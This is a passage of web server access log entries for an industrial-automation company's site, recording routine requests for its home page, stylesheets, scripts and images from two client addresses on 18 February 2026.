222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:39:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:40:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10339] [Gzip 5.49] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:00:40:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:40:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:40:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:40:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:40:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:40:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:40:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:40:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:40:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:40:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:40:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:40:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:40:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:43:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10339] [Gzip 5.49] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:00:43:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:43:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:43:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:43:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:43:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:43:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:43:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:43:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:43:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:43:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:43:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:43:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:43:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:48:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10347] [Gzip 5.49] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:00:48:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:48:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:48:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:48:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:48:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:48:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:48:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:48:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:48:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:48:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:48:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:48:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:00:48:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:01:06:33 +0000] - - 301 - GET http www.hanmocnn.co.kr "/" [Client 205.169.39.217] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" "-" +[18/Feb/2026:01:06:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 205.169.39.217] [Length 10360] [Gzip 5.49] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" "-" +[18/Feb/2026:01:06:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 205.169.39.217] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:01:06:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 205.169.39.217] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:01:06:49 +0000] - - 301 - GET http www.hanmocnn.co.kr "/" [Client 205.169.39.217] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" "-" +[18/Feb/2026:01:06:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 205.169.39.217] [Length 10347] [Gzip 5.49] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" "-" +[18/Feb/2026:01:06:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 205.169.39.217] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:01:06:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 205.169.39.217] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:01:06:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 205.169.39.217] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:01:06:52 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 205.169.39.217] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:01:06:52 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 205.169.39.217] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:01:06:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 205.169.39.217] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:01:06:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 205.169.39.217] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:01:06:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 205.169.39.217] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:01:06:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 205.169.39.217] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:01:06:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 205.169.39.217] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:01:06:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 205.169.39.217] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:01:06:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 205.169.39.217] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:01:09:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10340] [Gzip 5.49] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:01:09:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:01:09:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:01:09:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:01:09:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:01:09:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:01:09:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:01:09:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:01:09:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:01:09:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:01:09:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:01:09:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:01:09:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:01:09:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:01:14:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10383] [Gzip 5.49] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:01:14:03 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:01:14:03 +0000] - 200 200 - 